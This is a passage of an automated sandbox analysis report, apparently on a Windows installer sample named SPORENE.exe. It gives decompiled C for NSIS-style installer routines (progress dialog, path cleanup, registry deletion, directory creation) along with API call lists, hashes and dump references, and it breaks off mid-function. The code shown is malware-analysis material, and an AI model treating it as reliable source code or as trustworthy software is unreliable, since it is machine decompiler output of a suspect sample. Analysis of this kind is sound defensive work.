                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: File$Pointer$ByteCharMultiWide$Read
                • String ID: 9
                • API String ID: 163830602-2366072709
                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040559F(signed int _a4, WCHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				WCHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				WCHAR* _t27;
                				signed int _t28;
                				long _t29;
                				signed int _t37;
                				signed int _t38;
                
                				_t27 =  *0x433ee4;
                				_v8 = _t27;
                				if(_t27 != 0) {
                					_t37 =  *0x434fb4;
                					_v12 = _t37;
                					_t38 = _t37 & 0x00000001;
                					if(_t38 == 0) {
                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                					}
                					_t27 = lstrlenW(0x42c248);
                					_a4 = _t27;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) == 0) {
                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                						}
                						if((_v12 & 0x00000002) == 0) {
                							_v32 = 0x42c248;
                							_v52 = 1;
                							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t38;
                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                						}
                						if(_t38 != 0) {
                							_t28 = _a4;
                							0x42c248[_t28] = 0;
                							return _t28;
                						}
                					} else {
                						_t27 = lstrlenW(_a8) + _a4;
                						if(_t27 < 0x1000) {
                							_t27 = lstrcatW(0x42c248, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t27;
                			}


















                APIs
                • lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                • String ID:
                • API String ID: 1495540970-0
                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E004067C4(WCHAR* _a4) {
                				short _t5;
                				short _t7;
                				WCHAR* _t19;
                				WCHAR* _t20;
                				WCHAR* _t21;
                
                				_t20 = _a4;
                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                					_t20 =  &(_t20[4]);
                				}
                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                					_t20 =  &(_t20[2]);
                				}
                				_t5 =  *_t20;
                				_t21 = _t20;
                				_t19 = _t20;
                				if(_t5 != 0) {
                					do {
                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                							_t19 = CharNextW(_t19);
                						}
                						_t20 = CharNextW(_t20);
                						_t5 =  *_t20;
                					} while (_t5 != 0);
                				}
                				 *_t19 =  *_t19 & 0x00000000;
                				while(1) {
                					_push(_t19);
                					_push(_t21);
                					_t19 = CharPrevW();
                					_t7 =  *_t19;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t19 =  *_t19 & 0x00000000;
                					if(_t21 < _t19) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}









                APIs
                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                • CharNextW.USER32(?,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                • CharPrevW.USER32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: Char$Next$Prev
                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-826357637
                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}















                APIs
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                • GetMessagePos.USER32 ref: 00404E77
                • ScreenToClient.USER32 ref: 00404E91
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                				short _v132;
                				int _t11;
                				int _t20;
                
                				if(_a8 == 0x110) {
                					SetTimer(_a4, 1, 0xfa, 0);
                					_a8 = 0x113;
                				}
                				if(_a8 == 0x113) {
                					_t20 =  *0x41ea18; // 0x1ffd3
                					_t11 =  *0x42aa24;
                					if(_t20 >= _t11) {
                						_t20 = _t11;
                					}
                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                					SetWindowTextW(_a4,  &_v132);
                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                				}
                				return 0;
                			}







                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                • MulDiv.KERNEL32(0001FFD3,00000064,?), ref: 00402FDC
                • wsprintfW.USER32 ref: 00402FEC
                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                • SetDlgItemTextW.USER32 ref: 0040300E
                Strings
                • verifying installer: %d%%, xrefs: 00402FE6
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00402950(int __ebx, void* __eflags) {
                				WCHAR* _t26;
                				void* _t29;
                				long _t37;
                				int _t49;
                				void* _t52;
                				void* _t54;
                				void* _t56;
                				void* _t59;
                				void* _t60;
                				void* _t61;
                
                				_t49 = __ebx;
                				_t52 = 0xfffffd66;
                				_t26 = E00402DA6(0xfffffff0);
                				_t55 = _t26;
                				 *(_t61 - 0x40) = _t26;
                				if(E00405E83(_t26) == 0) {
                					E00402DA6(0xffffffed);
                				}
                				E00406008(_t55);
                				_t29 = E0040602D(_t55, 0x40000000, 2);
                				 *(_t61 + 8) = _t29;
                				if(_t29 != 0xffffffff) {
                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                					if( *(_t61 - 0x28) != _t49) {
                						_t37 =  *0x434f14;
                						 *(_t61 - 0x44) = _t37;
                						_t54 = GlobalAlloc(0x40, _t37);
                						if(_t54 != _t49) {
                							E004034E5(_t49);
                							E004034CF(_t54,  *(_t61 - 0x44));
                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                							 *(_t61 - 0x10) = _t59;
                							if(_t59 != _t49) {
                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                								while( *_t59 != _t49) {
                									_t60 = _t59 + 8;
                									 *(_t61 - 0x3c) =  *_t59;
                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                									_t59 = _t60 +  *(_t61 - 0x3c);
                								}
                								GlobalFree( *(_t61 - 0x10));
                							}
                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                							GlobalFree(_t54);
                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                						}
                					}
                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                					CloseHandle( *(_t61 + 8));
                				}
                				_t56 = 0xfffffff3;
                				if(_t52 < _t49) {
                					_t56 = 0xffffffef;
                					DeleteFileW( *(_t61 - 0x40));
                					 *((intOrPtr*)(_t61 - 4)) = 1;
                				}
                				_push(_t56);
                				E00401423();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                				return 0;
                			}














                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                • GlobalFree.KERNEL32 ref: 00402A06
                • GlobalFree.KERNEL32 ref: 00402A19
                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405A6E(WCHAR* _a4) {
                				struct _SECURITY_ATTRIBUTES _v16;
                				struct _SECURITY_DESCRIPTOR _v36;
                				long _t23;
                
                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                				_v36.Owner = 0x4083f8;
                				_v36.Group = 0x4083f8;
                				_v36.Sacl = _v36.Sacl & 0x00000000;
                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                				_v16.lpSecurityDescriptor =  &_v36;
                				_v36.Revision = 1;
                				_v36.Control = 4;
                				_v36.Dacl = 0x4083e8;
                				_v16.nLength = 0xc;
                				if(CreateDirectoryW(_a4,  &_v16) != 0) {
                					L1:
                					return 0;
                				}
                				_t23 = GetLastError();
                				if(_t23 == 0xb7) {
                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                						goto L1;
                					}
                					return GetLastError();
                				}
                				return _t23;
                			}

                APIs
                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                • GetLastError.KERNEL32 ref: 00405AC5
                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                • GetLastError.KERNEL32 ref: 00405AE4
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3449924974-3936084776
                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                				void* _v8;
                				int _v12;
                				short _v536;
                				void* _t27;
                				signed int _t33;
                				intOrPtr* _t35;
                				signed int _t45;
                				signed int _t46;
                				signed int _t47;
                
                				_t46 = _a12;
                				_t47 = _t46 & 0x00000300;
                				_t45 = _t46 & 0x00000001;
                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                				if(_t27 == 0) {
                					if((_a12 & 0x00000002) == 0) {
                						L3:
                						_push(0x105);
                						_push( &_v536);
                						_push(0);
                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                							__eflags = _t45;
                							if(__eflags != 0) {
                								L10:
                								RegCloseKey(_v8);
                								return 0x3eb;
                							}
                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                							__eflags = _t33;
                							if(_t33 != 0) {
                								break;
                							}
                							_push(0x105);
                							_push( &_v536);
                							_push(_t45);
                						}
                						RegCloseKey(_v8);
                						_t35 = E0040690A(3);
                						if(_t35 != 0) {
                							return  *_t35(_a4, _a8, _t47, 0);
                						}
                						return RegDeleteKeyW(_a4, _a8);
                					}
                					_v12 = 0;
                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                						goto L10;
                					}
                					goto L3;
                				}
                				return _t27;
                			}

                APIs
                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CloseEnum$DeleteValue
                • String ID:
                • API String ID: 1354259210-0
                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00401D81(void* __ebx, void* __edx) {
                				struct HWND__* _t30;
                				WCHAR* _t38;
                				void* _t48;
                				void* _t53;
                				signed int _t55;
                				signed int _t60;
                				long _t63;
                				void* _t65;
                
                				_t53 = __ebx;
                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                				} else {
                					E00402D84(2);
                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                				}
                				_t55 =  *(_t65 - 0x24);
                				 *(_t65 + 8) = _t30;
                				_t60 = _t55 & 0x00000004;
                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                				if((_t55 & 0x00010000) == 0) {
                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                				} else {
                					_t38 = E00402DA6(0x11);
                				}
                				 *(_t65 - 0x44) = _t38;
                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                				asm("sbb esi, esi");
                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                					DeleteObject(_t48);
                				}
                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                					_push(_t63);
                					E00406484();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00401E4E(intOrPtr __edx) {
                				void* __edi;
                				int _t9;
                				signed char _t15;
                				struct HFONT__* _t18;
                				intOrPtr _t30;
                				void* _t31;
                				struct HDC__* _t33;
                				void* _t35;
                
                				_t30 = __edx;
                				_t33 = GetDC( *(_t35 - 8));
                				_t9 = E00402D84(2);
                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                				ReleaseDC( *(_t35 - 8), _t33);
                				 *0x40ce00 = E00402D84(3);
                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                				 *0x40ce07 = 1;
                				 *0x40ce04 = _t15 & 0x00000001;
                				 *0x40ce05 = _t15 & 0x00000002;
                				 *0x40ce06 = _t15 & 0x00000004;
                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                				_t18 = CreateFontIndirectW(0x40cdf0);
                				_push(_t18);
                				_push(_t31);
                				E00406484();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                				return 0;
                			}

                APIs
                • GetDC.USER32(?), ref: 00401E51
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                • ReleaseDC.USER32 ref: 00401E84
                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                • String ID:
                • API String ID: 2584051700-0
                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                				char _v68;
                				char _v132;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t23;
                				signed int _t24;
                				void* _t31;
                				void* _t33;
                				void* _t34;
                				void* _t44;
                				signed int _t46;
                				signed int _t50;
                				signed int _t52;
                				signed int _t53;
                				signed int _t55;
                
